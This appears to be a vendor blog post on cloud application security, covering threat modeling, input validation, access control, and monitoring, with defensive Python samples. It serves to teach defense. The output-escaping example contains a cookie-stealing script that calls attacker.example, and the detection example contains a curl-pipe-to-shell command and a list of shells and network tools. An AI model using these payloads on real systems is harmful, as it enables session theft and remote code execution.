Editor’s note: This is Part 3 of a five-part cloud security series that covers protecting an organization’s network perimeter, endpoints, application code, sensitive data, and service and user accounts from threats.

In Parts 1 and 2 of this series, we discussed the importance of protecting the boundaries of networks in cloud environments and best practices for applying efficient security controls to endpoints. In this post, we’ll look at how organizations can protect their applications—another key, vulnerable part of their cloud-native footprint—by doing the following:

- Staying up to date on the latest threats

- Leveraging threat modeling to surface vulnerabilities in an application’s design

- Implementing validation and access controls at the application level

- Creating an effective monitoring strategy

But first, we’ll briefly look at the complexities of modern application architectures and how they can easily become vulnerable to an attack.

Primer on modern application architectures



Traditional applications have historically been built on monolithic architectures. These models deploy all the components that make up an application, such as its user interface, application services, and backend resources, as a single, self-contained unit. For example, the core functions of an e-commerce application, such as payment processing, order fulfillment, and product management, are tightly coupled and typically rely on a shared database. For smaller applications, this architecture simplifies developing and releasing new functionality because engineers modify only a single code repository and deploy changes packaged as a single file or directory. But monolithic applications have inherent limitations and can introduce complexity as organizations scale.

Because monolithic applications are packaged as a single unit, they become increasingly difficult to update as an organization and its codebase grow: a simple change can break the entire application. In addition, releasing any change requires redeploying the whole application instead of only the components that were updated. This slows the organization's ability to release timely software updates, including critical hotfixes, to customers.

For these reasons and more, organizations are steadily migrating their monolithic applications to microservices in the cloud. Microservice-based architectures break an application down into a collection of smaller, independent services, each responsible for a specific function. The following diagram illustrates how the core functions of a monolithic e-commerce application can be broken into several decoupled services, each with a dedicated database:

Microservice-based architectures provide many advantages. They improve fault isolation, which means that an issue in one service is less likely to affect other services. Microservices are also technology-agnostic, so each service can use the programming language, development framework, or infrastructure that best fits its own requirements and the organization's objectives. For example, microservice infrastructure may use container technologies like Docker and Kubernetes, serverless technologies, or a combination of both. Container tools are designed to support modular application services and are growing in popularity across all major public clouds. Serverless functions, on the other hand, split an application's functionality into individual modules that run only when triggered by specific events. Decoupling services through APIs in this way can lead to faster deployments and reduced costs, among many other advantages.

As a result, microservice-based architectures, along with the technologies and resources that support them, have become the standard for building modern cloud applications. But their decoupled design can expose them to a wide variety of security threats. Under the shared responsibility model, cloud providers secure the underlying systems that support an application's managed serverless and container-based services, while organizations are responsible for protecting their application's code and data.

Using tools and security controls to protect cloud-based application components like code and infrastructure at every stage of their life cycle is referred to as application security. In this post, we’ll focus on the following best practices for securing these applications:

- Stay up to date on the latest threats

- Use threat modeling to surface vulnerabilities in an application’s design

- Implement validation and access controls at the application level

- Create an effective monitoring strategy

With these practices, organizations can complement their existing endpoint and network perimeter security measures, enabling them to build an effective defense-in-depth strategy.

Stay up to date on the latest threats, and why it’s important

Organizations can start their security journey by learning how attackers exploit application vulnerabilities to access critical application resources and data. Simply put, organizations first need to know what they are protecting their applications from.

Threat actors target applications and their functionality for many reasons, often as part of an attack chain to gain access to underlying systems. Their goals can include holding an organization's data for ransom, bringing business-critical systems offline, or taking advantage of an application's coupon or discount system, a form of misuse referred to as abuse of functionality. To accomplish these goals, threat actors attempt to find and exploit application weaknesses, so it's critical to be aware of the most common security risks. The Open Web Application Security Project (OWASP) has identified the top ten types of vulnerabilities that threat actors can abuse, which include broken access controls, outdated dependencies, insecure application design, and gaps in security logging and monitoring.

These weaknesses can appear in an application's code as well as in the infrastructure that runs it, such as Kubernetes clusters and serverless platforms. For Kubernetes, some of the areas most susceptible to attack include workloads and role-based access control (RBAC) configurations. For instance, threat actors can exploit unprotected or unmonitored workloads by spinning up containers with malicious images. Additionally, overly permissive RBAC policies can grant threat actors unchecked access to entire clusters and their resources.
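To make the RBAC risk concrete, here is a minimal Python sketch that scans Role or ClusterRole definitions for wildcard or escalation-prone grants. It assumes the manifests have already been parsed into dictionaries (for example, with a YAML loader), and the lists of risky verbs and sensitive resources are illustrative assumptions rather than an official benchmark.

```python
from typing import Any

# Illustrative assumption: verbs that grant broad or escalation-prone capabilities.
RISKY_VERBS = {"*", "escalate", "bind", "impersonate"}
# Illustrative assumption: resources whose access often leads to wider compromise.
SENSITIVE_RESOURCES = {"*", "secrets", "pods/exec", "clusterrolebindings"}


def find_permissive_rules(role: dict[str, Any]) -> list[str]:
    """Return human-readable findings for rules that look overly permissive."""
    findings = []
    name = role.get("metadata", {}).get("name", "<unnamed>")
    for index, rule in enumerate(role.get("rules", [])):
        risky_verbs = set(rule.get("verbs", [])) & RISKY_VERBS
        sensitive = set(rule.get("resources", [])) & SENSITIVE_RESOURCES
        if risky_verbs:
            findings.append(f"{name} rule {index}: risky verbs {sorted(risky_verbs)}")
        if sensitive:
            findings.append(f"{name} rule {index}: sensitive resources {sorted(sensitive)}")
    return findings


# Hypothetical manifests, already parsed into dictionaries.
admin_like = {
    "kind": "ClusterRole",
    "metadata": {"name": "ci-deployer"},
    "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}],
}
read_only = {
    "kind": "Role",
    "metadata": {"name": "pod-reader"},
    "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}],
}

for finding in find_permissive_rules(admin_like) + find_permissive_rules(read_only):
    print(finding)
```

The read-only role produces no findings, while the wildcard ClusterRole is flagged for both its verbs and its resources.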

Serverless architectures can also be subject to application-level attacks. Even though serverless services execute code only when needed and cloud providers manage the underlying resources, threat actors can exploit serverless code much as they would code running on dedicated containers or hosts. For example, serverless functions are event-based, which means they rely on external activity (i.e., events), such as an upload to a storage bucket or an HTTP request, to trigger function code. Consequently, serverless-based services can be susceptible to event-data injection attacks, which involve passing malicious code or SQL commands into an event's payload to be processed by the function.
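A common defense against event-data injection is to validate the payload and pass it to the database as bound parameters rather than concatenating it into SQL. The sketch below illustrates this in Python with an in-memory SQLite database; the `handler` function, its event shape, and the `orders` table are hypothetical, and a real function would receive its event and database connection from the platform rather than as plain arguments.

```python
import re
import sqlite3

# Hypothetical rule: customer IDs are 1 to 12 ASCII digits.
CUSTOMER_ID_PATTERN = re.compile(r"[0-9]{1,12}")


def handler(event: dict, conn: sqlite3.Connection) -> list[tuple]:
    """Hypothetical function handler that returns a customer's orders.

    The event shape ({"customer_id": "..."}) is an assumption for illustration.
    """
    customer_id = event.get("customer_id")
    # Validate the payload field before using it.
    if not isinstance(customer_id, str) or not CUSTOMER_ID_PATTERN.fullmatch(customer_id):
        raise ValueError("customer_id must be a string of 1-12 digits")
    # Parameterized query: the driver binds customer_id as a value, never as SQL text.
    cursor = conn.execute(
        "SELECT id, total FROM orders WHERE customer_id = ?", (int(customer_id),)
    )
    return cursor.fetchall()


# Demo with an in-memory database standing in for the real data store.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, customer_id INTEGER, total REAL)")
conn.executemany(
    "INSERT INTO orders (customer_id, total) VALUES (?, ?)", [(1, 19.99), (2, 5.0)]
)

print(handler({"customer_id": "1"}, conn))  # [(1, 19.99)]
try:
    handler({"customer_id": "1 OR 1=1"}, conn)
except ValueError as err:
    print("rejected:", err)
```

Validation rejects the malformed payload outright, and parameterization means that even a value that slipped past validation would be treated as data rather than executed as SQL.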

Organizations can use their understanding of common application vulnerabilities and threats to make informed, security-focused decisions during the development process, which we’ll look at in more detail next.

Use threat modeling to find potential vulnerabilities in an application’s design

Threat actors typically execute attacks in a hierarchical pattern. This means that they follow a logical path from one or more initial entry points into an application toward their ultimate goal, such as accessing sensitive data. To get more visibility into the tactics and techniques that threat actors use in an attack chain, organizations can use the MITRE ATT&CK framework alongside processes like threat modeling to analyze their application's design for exploitable weaknesses.


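One common way to capture this hierarchical structure is an attack tree, where the root is the attacker's goal and child nodes are the steps that lead to it. The following Python sketch is illustrative only: the tree, its technique names, and the `achievable` helper are hypothetical, and the code does not use ATT&CK data. It shows how mitigating specific techniques can cut off every path to the goal.

```python
from dataclasses import dataclass, field


@dataclass
class Node:
    """A node in a simple attack tree. Leaves are individual techniques;
    inner nodes combine children with AND (all needed) or OR (any suffices)."""
    name: str
    gate: str = "LEAF"  # "LEAF", "AND", or "OR"
    children: list["Node"] = field(default_factory=list)


def achievable(node: Node, feasible: set[str]) -> bool:
    """Return True if the attacker can reach this node, given the set of
    leaf techniques that are not yet mitigated."""
    if node.gate == "LEAF":
        return node.name in feasible
    results = [achievable(child, feasible) for child in node.children]
    return all(results) if node.gate == "AND" else any(results)


# Hypothetical tree: the goal can be reached through either branch.
goal = Node("exfiltrate customer data", "OR", [
    Node("SQL injection in search API"),
    Node("abuse leaked credentials", "AND", [
        Node("phish developer credentials"),
        Node("overly permissive database role"),
    ]),
])

unmitigated = {"SQL injection in search API", "phish developer credentials",
               "overly permissive database role"}
print(achievable(goal, unmitigated))  # True
# After fixing the injection flaw and tightening the database role:
print(achievable(goal, {"phish developer credentials"}))  # False
```

Because the credential branch is an AND node, tightening the database role blocks that path even though phishing remains possible.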

Threat models help organizations understand what can go wrong in their applications or services, the best path to fixing issues, and whether their fixes were effective. There are multiple methodologies that organizations can use when creating threat models, and each one takes a different approach. For example, the STRIDE methodology focuses on identifying new threats early in development by sorting them into the following categories:

- Spoofing an identity: assuming another identity in order to commit fraud

- Tampering with data: changing data without authorization

- Repudiation: performing an action that cannot be traced back to the attacker, who can then deny having done it

- Information disclosure: unintentionally revealing data to unauthorized users

- Denial of service (DoS): preventing authorized users from accessing application resources

- Elevation of privilege: gaining permissions beyond those originally granted, such as admin-level access
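Threat modeling tools often apply STRIDE per element, checking each component in a data flow diagram against the categories that typically apply to its type. The sketch below encodes a commonly cited version of that mapping in Python; the component names are hypothetical, and real threat models usually refine the list by hand.

```python
# Commonly cited STRIDE-per-element mapping. Data stores can also face
# repudiation when they hold audit logs; that case is omitted for simplicity.
STRIDE_PER_ELEMENT = {
    "external_entity": ["Spoofing", "Repudiation"],
    "process": ["Spoofing", "Tampering", "Repudiation",
                "Information disclosure", "Denial of service", "Elevation of privilege"],
    "data_flow": ["Tampering", "Information disclosure", "Denial of service"],
    "data_store": ["Tampering", "Information disclosure", "Denial of service"],
}


def enumerate_threats(components: dict[str, str]) -> list[tuple[str, str]]:
    """Pair each component with the STRIDE categories that apply to its type."""
    return [
        (name, threat)
        for name, kind in components.items()
        for threat in STRIDE_PER_ELEMENT[kind]
    ]


# Hypothetical components for a new payment feature.
payment_feature = {
    "customer browser": "external_entity",
    "payment service": "process",
    "card data over HTTPS": "data_flow",
    "customer database": "data_store",
}

for component, threat in enumerate_threats(payment_feature):
    print(f"{component}: {threat}")
```

The output is a checklist of candidate threats per component that the team can then rank and assign mitigations to.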

STRIDE helps organizations decide where to prioritize security measures in new features by having them catalog each of the application services and data involved in the feature's development. The following diagram shows an example STRIDE threat model for a new cloud-hosted application service:

This model shows each of the components involved in a new payment system, including those that handle critical data, such as credit card information. It also identifies the parts of the system that could be vulnerable to attacks, such as the backend database that stores customer data, and the types of attacks each one is particularly at risk from.

Threat modeling is critical to ensuring application security because it helps organizations visualize risks across their services. When organizations know precisely where their applications are vulnerable and what they might be vulnerable to, they can implement effective security controls in their infrastructure as well as improve their monitoring capabilities.

Implement security controls at the application level

Cloud applications are supported by many interconnected clusters and serverless functions, so it's critical to implement security controls at the application level for each of these components. As mentioned previously, some of the top vulnerabilities involve insecure application design, gaps in security logging and monitoring, and broken access controls. In this section, we'll focus on two practices that address these areas: input validation, and authentication and authorization.

Input validation aims to sanitize untrusted inputs like form fields, file uploads, and query parameters. When inputs are not sanitized or verified, threat actors can use them to inject malicious code that triggers issues in downstream services or targets end users who interact with the application. For example, a threat actor might inject a malicious script into an unsanitized field, such as a comment box. If the application stores that comment and serves it to other users, the script runs in each visitor's browser whenever the page is viewed. This kind of attack is referred to as cross-site scripting (XSS) and is a prominent way of stealing user data. Input validation helps organizations mitigate these and other types of injection attacks, which OWASP considers one of the top risks for applications.
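Input validation is usually paired with context-aware output encoding, so that any script that slips through is rendered as text rather than executed. The minimal sketch below uses Python's standard `html.escape` for the HTML body context only; the `render_comment` function is hypothetical, and attribute values, JavaScript, and URLs each need their own encoding rules.

```python
import html


def render_comment(author: str, body: str) -> str:
    """Render a user comment as an HTML fragment. User-controlled values are
    escaped so the browser treats them as text, not markup."""
    return (
        '<div class="comment">'
        f"<strong>{html.escape(author)}</strong>"
        f"<p>{html.escape(body)}</p>"
        "</div>"
    )


malicious = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
print(render_comment("mallory", malicious))
```

The printed fragment contains `&lt;script&gt;` instead of a live `<script>` tag, so a browser would display the payload rather than run it.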

Organizations can start mitigating these kinds of vulnerabilities by applying both syntactic and semantic validation to all inputs, including serverless event inputs. Syntactic validation enforces the correct format of structured data, such as currency amounts, dates, email addresses, and personally identifiable information like credit card numbers and Social Security numbers. Semantic validation enforces the correctness of values in a specific business context, such as requiring a start date to precede an end date or a price to fall within an expected range.
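The difference between the two strategies is easier to see in code. In this hypothetical Python booking validator, the syntactic checks confirm that the dates and amount are well formed, and the semantic checks apply assumed business rules: the start date must precede the end date, and the amount must fall within an arbitrary range.

```python
import re
from datetime import date
from decimal import Decimal

# Syntactic rule (assumed): up to 7 ASCII digits, a dot, and exactly 2 decimals.
AMOUNT_PATTERN = re.compile(r"[0-9]{1,7}\.[0-9]{2}")


def validate_booking(start: str, end: str, amount: str) -> list[str]:
    """Return a list of validation errors (empty if the input is valid)."""
    # Syntactic checks: is each field well formed?
    try:
        start_date = date.fromisoformat(start)
        end_date = date.fromisoformat(end)
    except ValueError:
        return ["dates must use YYYY-MM-DD format"]
    if not AMOUNT_PATTERN.fullmatch(amount):
        return ["amount must look like 123.45"]

    # Semantic checks: do the values make sense for the (hypothetical) business?
    errors = []
    if start_date >= end_date:
        errors.append("start date must be before end date")
    if not Decimal("1.00") <= Decimal(amount) <= Decimal("10000.00"):
        errors.append("amount must be between 1.00 and 10000.00")
    return errors


print(validate_booking("2024-05-01", "2024-05-03", "250.00"))  # []
print(validate_booking("2024-05-03", "2024-05-01", "250.00"))  # ['start date must be before end date']
print(validate_booking("05/01/2024", "2024-05-03", "250.00"))  # ['dates must use YYYY-MM-DD format']
```

Syntactic checks run first so that semantic rules only ever compare values that have already been parsed into the expected types.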

Authentication and authorization are both key workflows for application security, though they focus on different goals. Authentication workflows verify the identity of a user, resource, or service interacting with an application, and typically involve processes like confirming a username and password. Authorization workflows confirm that a user, resource, or service is allowed to perform a particular action, such as requesting data from a storage bucket.
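The following Python sketch keeps the two workflows separate: `authenticate` answers who is calling, and `authorize` answers whether that caller may perform an action, denying anything not explicitly granted. The token, user, and role stores are hypothetical in-memory dictionaries standing in for an identity provider and a policy store.

```python
import hmac
from typing import Optional

# Hypothetical stores; a real system would use an identity provider and policy store.
API_TOKENS = {"tok-alice-123": "alice", "tok-bob-456": "bob"}
USER_ROLES = {"alice": "analyst", "bob": "admin"}
ROLE_PERMISSIONS = {
    "analyst": {("read", "reports-bucket")},
    "admin": {("read", "reports-bucket"), ("delete", "reports-bucket")},
}


def authenticate(token: str) -> Optional[str]:
    """Authentication: who is making the request? Returns a user name or None."""
    for known_token, user in API_TOKENS.items():
        # Constant-time comparison avoids leaking token contents through timing.
        if hmac.compare_digest(known_token.encode(), token.encode()):
            return user
    return None


def authorize(user: str, action: str, resource: str) -> bool:
    """Authorization: may this user perform this action? Denies by default."""
    role = USER_ROLES.get(user)
    return (action, resource) in ROLE_PERMISSIONS.get(role, set())


user = authenticate("tok-alice-123")
print(user, authorize(user, "read", "reports-bucket"))    # alice True
print(user, authorize(user, "delete", "reports-bucket"))  # alice False
print(authenticate("forged-token"))                       # None
```

Unknown users, unknown roles, and unlisted actions all fall through to an empty permission set, which is how the deny-by-default behavior is expressed here.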

OWASP provides some best practices that organizations can consider when developing authorization and authentication controls across their application code, serverless functions, and Kubernetes architecture, including:

- Enforce strong passwords and multi-factor authentication for all accounts

- Store passwords using strong cryptographic techniques

- Enforce the principle of least privilege and deny all requests by default

- Use role-based access control (RBAC) or attribute-based access control (ABAC) processes

- Implement logging for all authorization and authentication events
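For password storage, the sketch below uses PBKDF2-HMAC-SHA256 from Python's standard `hashlib` with a random per-user salt and a constant-time comparison. OWASP's Password Storage Cheat Sheet prefers memory-hard algorithms such as Argon2id, which require a third-party package, so treat this as a minimal standard-library example; the iteration count is an assumption based on OWASP's published PBKDF2 guidance and should be checked against the current recommendation.

```python
import hashlib
import hmac
import os

# Assumed work factor, based on OWASP guidance for PBKDF2-HMAC-SHA256.
ITERATIONS = 600_000


def hash_password(password: str) -> tuple[bytes, bytes]:
    """Derive a salted hash. Store the salt and hash, never the password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return hmac.compare_digest(candidate, expected)


salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True
print(verify_password("password123", salt, stored))                   # False
```

The per-user salt means identical passwords produce different stored hashes, and the high iteration count makes each offline guess deliberately expensive.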

Organizations can take these recommendations a step further by prioritizing isolation for their resources. Serverless functions, for example, should each have their own identity and access management (IAM) role. Separating roles per function enables organizations to assign only the level of permissions that are needed, which enforces the principle of least privilege. For Kubernetes clusters, organizations can isolate container workloads from their hosts to ensure that threat actors have limited access to system resources.
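For serverless functions on AWS, per-function least privilege can be expressed as one IAM policy document per function role. The Python sketch below generates such documents using the standard IAM policy structure (`Version`, `Statement`, `Effect`, `Action`, `Resource`) and rejects wildcard grants. The function names, bucket and table ARNs, and account ID are hypothetical, and creating and attaching the roles is not shown.

```python
import json

# Hypothetical functions and the exact permissions each one needs.
FUNCTION_PERMISSIONS = {
    "resize-image": [
        (["s3:GetObject"], "arn:aws:s3:::uploads-bucket/*"),
        (["s3:PutObject"], "arn:aws:s3:::thumbnails-bucket/*"),
    ],
    "record-order": [
        (["dynamodb:PutItem"], "arn:aws:dynamodb:us-east-1:123456789012:table/orders"),
    ],
}


def build_policy(grants: list[tuple[list[str], str]]) -> dict:
    """Build an IAM policy document that allows only the listed actions."""
    for actions, resource in grants:
        # Reject blanket grants such as "s3:*" or a Resource of "*".
        if resource == "*" or any(action.endswith("*") for action in actions):
            raise ValueError(f"wildcard grant rejected: {actions} on {resource}")
    return {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Action": actions, "Resource": resource}
            for actions, resource in grants
        ],
    }


# One policy per function, so each role carries only what that function needs.
policies = {name: build_policy(grants) for name, grants in FUNCTION_PERMISSIONS.items()}
print(json.dumps(policies["record-order"], indent=2))
```

Keeping one policy per function means a compromised image-resizing function, for example, cannot write to the orders table.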

Create an effective monitoring strategy for code, endpoints, and networks



Having complete visibility into application activity at the network, service, and code level is critical for identifying and mitigating threats. But as organizations continue to expand their cloud infrastructure to include more application services, understanding which security monitoring tools are worth investing in can become increasingly difficult. To create an effective monitoring strategy that scales with complex infrastructure, organizations need to focus on investing in the right detection systems at each level.

The following diagram highlights the degree to which an organization can monitor activity at the network, endpoint, and application (or code) layers:

Organizations that use monitoring tools at the application layer have more visibility into malicious activity than those that rely only on network-layer detection systems. For example, by monitoring an account's IP traffic, organizations may be able to detect suspicious behavior but not the underlying tactics that confirm the account is compromised. Monitoring application activity, such as a database process launching a new shell or utility, gives more visibility into a threat actor's ultimate goals, which enables organizations to remediate threats more quickly.
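The database-launching-a-shell example can be sketched as a simple detection rule over process events. The event fields and process-name lists below are assumptions for illustration; this is not Datadog's rule format, and production rules typically add context such as container, user, and command-line patterns.

```python
from dataclasses import dataclass

# Assumed process names; adjust for the databases and tools in your environment.
DATABASE_PROCESSES = {"postgres", "mysqld", "mongod"}
SHELLS_AND_UTILITIES = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc"}


@dataclass
class ProcessEvent:
    """Hypothetical process-execution event, e.g. from a runtime sensor."""
    host: str
    parent_name: str
    child_name: str
    command_line: str


def is_suspicious(event: ProcessEvent) -> bool:
    """Flag a database server launching a shell or network utility."""
    return (event.parent_name in DATABASE_PROCESSES
            and event.child_name in SHELLS_AND_UTILITIES)


events = [
    ProcessEvent("db-1", "postgres", "postgres", "postgres: checkpointer"),
    ProcessEvent("db-1", "postgres", "sh", "sh -c curl http://attacker.example/x | sh"),
]
alerts = [event for event in events if is_suspicious(event)]
for alert in alerts:
    print(f"ALERT on {alert.host}: {alert.parent_name} spawned {alert.command_line!r}")
```

The routine worker process is ignored, while the shell launched by the database server produces an alert that points directly at the attacker's next step.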

In Parts 1 and 2 of this series, we discussed security monitoring tools for the cloud networks, subnetworks, and endpoints that support applications, and how Datadog provides a comprehensive view into each of these layers. Implementing an effective monitoring strategy at the application layer requires deep visibility into service code and third-party dependencies. Application logs are a primary source for tracking code-level activity, and tools like Cloud SIEMs can help organizations quickly sift through their logs to surface unusual behavior. But logs may not always provide enough context to mitigate application threats before they escalate, so organizations also need to be able to track how requests interact with application code, such as when they trigger API calls or execute SQL commands.
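As a simplified illustration of sifting logs for unusual behavior, the following Python sketch counts failed logins per client IP in JSON-formatted application logs and flags addresses at or above a threshold. The log fields (`event`, `outcome`, `client_ip`) and the threshold are hypothetical, and unlike a real SIEM detection rule, the sketch ignores time windows.

```python
import json
from collections import Counter

FAILED_LOGIN_THRESHOLD = 5  # Assumed threshold; tune to your traffic.


def failed_logins_by_ip(lines: list[str]) -> Counter:
    """Count failed login events per client IP in JSON log lines."""
    counts: Counter = Counter()
    for line in lines:
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # Skip malformed lines instead of failing the whole scan.
        if record.get("event") == "login" and record.get("outcome") == "failure":
            counts[record.get("client_ip", "unknown")] += 1
    return counts


def suspicious_ips(lines: list[str], threshold: int = FAILED_LOGIN_THRESHOLD) -> list[str]:
    """Return IPs whose failed-login count meets or exceeds the threshold."""
    return sorted(ip for ip, n in failed_logins_by_ip(lines).items() if n >= threshold)


# Hypothetical log sample using documentation-reserved IP addresses.
sample = [json.dumps({"event": "login", "outcome": "failure", "client_ip": "203.0.113.7"})] * 6
sample += [
    json.dumps({"event": "login", "outcome": "failure", "client_ip": "198.51.100.2"}),
    json.dumps({"event": "login", "outcome": "success", "client_ip": "198.51.100.2"}),
    "not json",
]
print(suspicious_ips(sample))  # ['203.0.113.7']
```
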



Application Security Management (ASM) platforms provide organizations with real-time visibility into targeted attacks or vulnerabilities that affect application services and APIs, such as those identified by OWASP or the Common Vulnerabilities and Exposures (CVE) program. For example, Datadog ASM can identify SQL injection patterns and help organizations visualize the path of the attack, as shown in the following screenshot:

To mitigate this activity, organizations can block any associated IPs directly from Datadog, ensuring that malicious sources are no longer able to interact with critical application services. But to take application security a step further, ASM tools should also provide visibility into any vulnerabilities introduced by third-party dependencies.
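Blocking an IP ultimately means rejecting requests from denylisted addresses before they reach application code. The generic Python sketch below shows that check with the standard `ipaddress` module; it is not how Datadog implements blocking, the `is_blocked` helper is hypothetical, and the denylisted addresses come from documentation-reserved ranges.

```python
import ipaddress

# Hypothetical denylist, e.g. populated from sources flagged by a security tool.
DENYLIST = [ipaddress.ip_network(n) for n in ("203.0.113.7/32", "198.51.100.0/24")]


def is_blocked(client_ip: str) -> bool:
    """Return True if the client address falls inside any denylisted network."""
    try:
        address = ipaddress.ip_address(client_ip)
    except ValueError:
        return True  # Treat unparseable addresses as untrusted.
    # Membership checks between IPv4 and IPv6 simply return False.
    return any(address in network for network in DENYLIST)


for ip in ("203.0.113.7", "198.51.100.42", "192.0.2.10"):
    print(ip, "blocked" if is_blocked(ip) else "allowed")
```

Using networks rather than single addresses lets the same check block an entire range when an attack is spread across many hosts.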



As previously mentioned, modern cloud applications are modular by design, which means that core functionality is often provided by open-source libraries that organizations do not manage. Software Composition Analysis (SCA) tools can help organizations manage these third-party dependencies and detect issues, such as outdated packages. The following example screenshot shows Datadog Vulnerability Management identifying an outdated Apache logging library:

This vulnerability could allow a threat actor to modify an application's logging configuration file to execute malicious code. Upgrading the library to a patched version mitigates the threat.
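At its core, an SCA check compares the versions of declared dependencies against advisory data that lists the first fixed version of each affected package. The Python sketch below shows that comparison; the package names and advisory entries are hypothetical, and version parsing is simplified to plain dotted numbers.

```python
# Hypothetical advisory data: package name -> first fixed version.
ADVISORIES = {
    "example-logging-lib": (3, 2, 0),
    "example-http-client": (4, 5, 0),
}


def parse_version(version: str) -> tuple[int, ...]:
    """Parse a plain dotted version such as '3.1.4' into integers.
    Pre-release tags and other suffixes are not handled in this sketch."""
    return tuple(int(part) for part in version.split("."))


def find_outdated(dependencies: dict[str, str]) -> list[str]:
    """Report dependencies older than the first fixed version in ADVISORIES."""
    findings = []
    for name, version in sorted(dependencies.items()):
        fixed = ADVISORIES.get(name)
        if fixed is not None and parse_version(version) < fixed:
            fixed_str = ".".join(map(str, fixed))
            findings.append(f"{name} {version} is vulnerable; upgrade to {fixed_str} or later")
    return findings


deps = {"example-logging-lib": "3.1.4", "example-http-client": "4.6.0", "unrelated-lib": "1.0.0"}
print(find_outdated(deps))
# ['example-logging-lib 3.1.4 is vulnerable; upgrade to 3.2.0 or later']
```

Real SCA tools also resolve transitive dependencies and handle richer version schemes, which this comparison deliberately leaves out.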

Secure your applications with these best practices

In this post, we looked at how modern cloud applications are designed and discussed best practices for securing application components. Being aware of application vulnerabilities, creating threat models, implementing application-level security controls, and developing an effective monitoring strategy can help organizations prevent attacks. These best practices can also complement an organization's existing network and endpoint security strategies. To learn more about Datadog's security offerings, check out our documentation, or sign up for a 14-day free trial today.